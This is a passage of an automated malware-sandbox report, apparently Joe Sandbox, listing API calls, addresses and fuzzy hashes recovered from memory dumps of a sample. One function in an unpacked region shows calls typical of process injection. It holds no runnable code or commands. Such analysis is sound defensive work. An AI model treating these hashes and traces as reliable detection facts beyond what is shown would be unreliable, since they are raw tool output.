                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                        • String ID:
                                                        • API String ID: 1046115767-0
                                                        • Opcode ID: 11fd96716d14da164d77f83585ad8a05b52c41e812f379259c9e72f16bf81dc0
                                                        • Instruction ID: 6266f5adf9a89e0e0201f49ab46beba29911f3d2a11bdc6fae966f67831f9a5c
                                                        • Opcode Fuzzy Hash: 11fd96716d14da164d77f83585ad8a05b52c41e812f379259c9e72f16bf81dc0
                                                        • Instruction Fuzzy Hash: CD11C2768D56148AD711BFA4F8413587AE17F813B5F262340E4603F3E2DBB48900DAA1
                                                        APIs
                                                          • Part of subcall function 00E6395C: __FF_MSGBANNER.LIBCMT ref: 00E63973
                                                          • Part of subcall function 00E6395C: __NMSG_WRITE.LIBCMT ref: 00E6397A
                                                          • Part of subcall function 00E6395C: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001,00000001,00000000,?,?,00E5F507,?,0000000E), ref: 00E6399F
                                                        • std::exception::exception.LIBCMT ref: 00E5F51E
                                                        • __CxxThrowException@8.LIBCMT ref: 00E5F533
                                                          • Part of subcall function 00E66805: RaiseException.KERNEL32(?,?,0000000E,00EF6A30,?,?,?,00E5F538,0000000E,00EF6A30,?,00000001), ref: 00E66856
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: aa8573558739c463f3afed875fb3b7277c9f4739c0b08047f2d7aad86d5400fc
                                                        • Instruction ID: 2ba7254d9ec76017cd2cbac6f0ce3516e52c5df83b4c4c38d7a51aed04d8d5dc
                                                        • Opcode Fuzzy Hash: aa8573558739c463f3afed875fb3b7277c9f4739c0b08047f2d7aad86d5400fc
                                                        • Instruction Fuzzy Hash: 1BF0F43114420D67CB04BFA8ED02ADE77EC9F00395F206839FD08B2181DBB29A5586A5
                                                        APIs
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        • __lock_file.LIBCMT ref: 00E63629
                                                          • Part of subcall function 00E64E1C: __lock.LIBCMT ref: 00E64E3F
                                                        • __fclose_nolock.LIBCMT ref: 00E63634
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 0e9a70bb50b8efebf3ec8757ba5d70d44483b57c6a8a7d277fd7de8aebf07f09
                                                        • Instruction ID: 6a64d2797cd25109bd042d7fa098bba92076aaee558296add47ae4b07fa3cc5a
                                                        • Opcode Fuzzy Hash: 0e9a70bb50b8efebf3ec8757ba5d70d44483b57c6a8a7d277fd7de8aebf07f09
                                                        • Instruction Fuzzy Hash: 43F0BB719C1304AAD711BF75E80676EBAE06F403B4F25A118E411BB2D2C77C87019B95
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00BC2E5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BC2EF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BC2F13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction ID: 0e37e383336e1832aa9825d6e75bc5bc620e6d9eec3866ef4f77ada87806b95d
                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction Fuzzy Hash: 4512DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CB5A
                                                        APIs
                                                        • __flush.LIBCMT ref: 00E62A0B
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __flush__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 4101623367-0
                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                        • Instruction ID: 7c424f05170010055d3a9bdbd36ec799a18cdf2c572c0afadc8c7994747d3b27
                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                        • Instruction Fuzzy Hash: EE41C930780F069FDF2C8EA9E8805AE77B6AFC43E4B14A53DE955E7240D6B4DD408B40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: f19907ef3ae8cafc25a723f2b25f0fe8ef0a8c325d582dcfed96d7113618c269
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 2F31E870A00105DBC71CDF28C4849A9FBB6FF49345B649AA5E809EB355DB31EEC5CB80
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 8c6ca64732747bcce3f0eb59b599c71dfde7632d953e30a0ad3973abba474e4e
                                                        • Instruction ID: a4c391a61378e5d9016129686ebcc683f4face1c7cb473e9a7f73e9f6b7223b3
                                                        • Opcode Fuzzy Hash: 8c6ca64732747bcce3f0eb59b599c71dfde7632d953e30a0ad3973abba474e4e
                                                        • Instruction Fuzzy Hash: 07314D75504524DFCB11AF10D0916AEBBF1FF4E320F20A89AEA962F386D774A905CB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: d93e1d68d6e7f7a83ed4bb244d80280f148702c7c716171b72cb86b5f6eb2588
                                                        • Instruction ID: 6e1702c181df947f9e092fba39c2c6c02951ce710f2eeda6d2b549d93864f4da
                                                        • Opcode Fuzzy Hash: d93e1d68d6e7f7a83ed4bb244d80280f148702c7c716171b72cb86b5f6eb2588
                                                        • Instruction Fuzzy Hash: 72415D705086118FDB24CF14C484B1ABBF0BF45309F1999ACE99A6B362D772EC49CF52
                                                        APIs
                                                          • Part of subcall function 00E44214: FreeLibrary.KERNEL32(00000000,?), ref: 00E44247
                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E439FE,?,00000001), ref: 00E441DB
                                                          • Part of subcall function 00E44291: FreeLibrary.KERNEL32(00000000), ref: 00E442C4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load
                                                        • String ID:
                                                        • API String ID: 2391024519-0
                                                        • Opcode ID: bc9f578948bab0440955496eaa828e2ef43a03ff80ea24bb9a4ea870c37f451b
                                                        • Instruction ID: 1f5290ef628b0b234a3e945b5d67c2e028d20744e5b248b4ccbffea6330c3f71
                                                        • Opcode Fuzzy Hash: bc9f578948bab0440955496eaa828e2ef43a03ff80ea24bb9a4ea870c37f451b
                                                        • Instruction Fuzzy Hash: 4511E3B1700306AADB14BF70EC06FAE77E99F40700F109829B596B61D1EEB19A019B64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: b2a5969eeb9e817bfc000083ceb05ae53e320d53830d928d49ea4aea006fe420
                                                        • Instruction ID: 75d3884d9c45760d96aab0c75acc5f91810c341d66e9ae14379a1913ce5708f8
                                                        • Opcode Fuzzy Hash: b2a5969eeb9e817bfc000083ceb05ae53e320d53830d928d49ea4aea006fe420
                                                        • Instruction Fuzzy Hash: 7E2125705086018FDB24DF68C444B1ABBF1BF85309F155968FA9A6B262D732F849CF52
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 00E6AFC0
                                                          • Part of subcall function 00E67BDA: __getptd_noexit.LIBCMT ref: 00E67BDA
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                        • String ID:
                                                        • API String ID: 1144279405-0
                                                        • Opcode ID: ee2f35581fd52a694c36d4b127a3928770992f828d62930766ee4639ce1ebf22
                                                        • Instruction ID: 398b3ab109093391aa56a719be01f21d510f436175b62473deb0d6c93944fd10
                                                        • Opcode Fuzzy Hash: ee2f35581fd52a694c36d4b127a3928770992f828d62930766ee4639ce1ebf22
                                                        • Instruction Fuzzy Hash: 0211E272884200CBD7526FA4F80179A7BE1AF413B9F296240E4707F1E2CBB58D409BA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                        • Instruction ID: 31f3500894aa0770242c5ad33dbf054b6a8827d9a6ecbe90f9d49f7bd7597682
                                                        • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                        • Instruction Fuzzy Hash: D4018171500109AECF05EFA4D8828FEBBB4AF21344F109069B566B71A5EA309A49DB64
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00E62AED
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 9b215de4a844d2ac0a93a6060533ce29a01651fb2bcd13361438e70cd3796359
                                                        • Instruction ID: d90a86bc0e5dd6e902854e2084c61b206b8f5f79b2efdf3f2a3d7bbe51235fd5
                                                        • Opcode Fuzzy Hash: 9b215de4a844d2ac0a93a6060533ce29a01651fb2bcd13361438e70cd3796359
                                                        • Instruction Fuzzy Hash: A0F0C231580605ABDF21AFB4AC0639F3AE1BF40394F14A419B520BB191C7B98A12EB81
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00E439FE,?,00000001), ref: 00E44286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 63e2aba0933fed3cd6efa6e4b05c473c6184cb0c79335683ef88d96326d4a7a2
                                                        • Instruction ID: 4e2b6bfa80b98bec991fcf843dbc7fd70756df77467814a0308539209e0fc098
                                                        • Opcode Fuzzy Hash: 63e2aba0933fed3cd6efa6e4b05c473c6184cb0c79335683ef88d96326d4a7a2
                                                        • Instruction Fuzzy Hash: 8CF0A9B0609702CFCB348F60E880912FBE0BF00329324AA3EF1D6A2660C7B29940CF44
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E440C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID:
                                                        • API String ID: 82841172-0
                                                        • Opcode ID: eace2487cce7c36e318f451de4e9f7f65d175ca13f792713e7fd231e06ac3c02
                                                        • Instruction ID: 92bc8255fe0a141fdc0c641db2eb50e23e3cf51cfba8f40ee233a11c22ef8876
                                                        • Opcode Fuzzy Hash: eace2487cce7c36e318f451de4e9f7f65d175ca13f792713e7fd231e06ac3c02
                                                        • Instruction Fuzzy Hash: D0E0C2366002245BC711A658EC46FEA77EDDFC86A0F0910B5F909F7244DA64A9829690
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00BC36B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 9460bdff53a3ba20a8a2fe65d922b2a58e5b4be81a2644de40e43c07e2c40946
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: C9E0E67494410EEFDB00EFB8D54969E7FF4EF04701F1041A5FD01D2280D6309E508A62
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00EAF87D
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EAF8DC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EAF919
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EAF940
                                                        • SendMessageW.USER32 ref: 00EAF966
                                                        • _wcsncpy.LIBCMT ref: 00EAF9D2
                                                        • GetKeyState.USER32(00000011), ref: 00EAF9F3
                                                        • GetKeyState.USER32(00000009), ref: 00EAFA00
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EAFA16
                                                        • GetKeyState.USER32(00000010), ref: 00EAFA20
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EAFA4F
                                                        • SendMessageW.USER32 ref: 00EAFA72
                                                        • SendMessageW.USER32(?,00001030,?,00EAE059), ref: 00EAFB6F
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00EAFB85
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EAFB96
                                                        • SetCapture.USER32(?), ref: 00EAFB9F
                                                        • ClientToScreen.USER32(?,?), ref: 00EAFC03
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EAFC0F
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00EAFC29
                                                        • ReleaseCapture.USER32 ref: 00EAFC34
                                                        • GetCursorPos.USER32(?), ref: 00EAFC69
                                                        • ScreenToClient.USER32(?,?), ref: 00EAFC76
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAFCD8
                                                        • SendMessageW.USER32 ref: 00EAFD02
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAFD41
                                                        • SendMessageW.USER32 ref: 00EAFD6C
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EAFD84
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EAFD8F
                                                        • GetCursorPos.USER32(?), ref: 00EAFDB0
                                                        • ScreenToClient.USER32(?,?), ref: 00EAFDBD
                                                        • GetParent.USER32(?), ref: 00EAFDD9
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAFE3F
                                                        • SendMessageW.USER32 ref: 00EAFE6F
                                                        • ClientToScreen.USER32(?,?), ref: 00EAFEC5
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EAFEF1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAFF19
                                                        • SendMessageW.USER32 ref: 00EAFF3C
                                                        • ClientToScreen.USER32(?,?), ref: 00EAFF86
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EAFFB6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB004B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 2516578528-4164748364
                                                        • Opcode ID: 63997c35be2646bdf15cf0618ba2e4f62e36c4f2e5075739bdd72987968ee383
                                                        • Instruction ID: 061c7d90a0058215eb728b16ff04d18616df8f1942e510bd310ebedb73581bd1
                                                        • Opcode Fuzzy Hash: 63997c35be2646bdf15cf0618ba2e4f62e36c4f2e5075739bdd72987968ee383
                                                        • Instruction Fuzzy Hash: 6F32AE74604244AFDB24CFA4CC84BAABBA4FF4E358F141639F595AB2A1C732EC05DB51
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EAB1CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
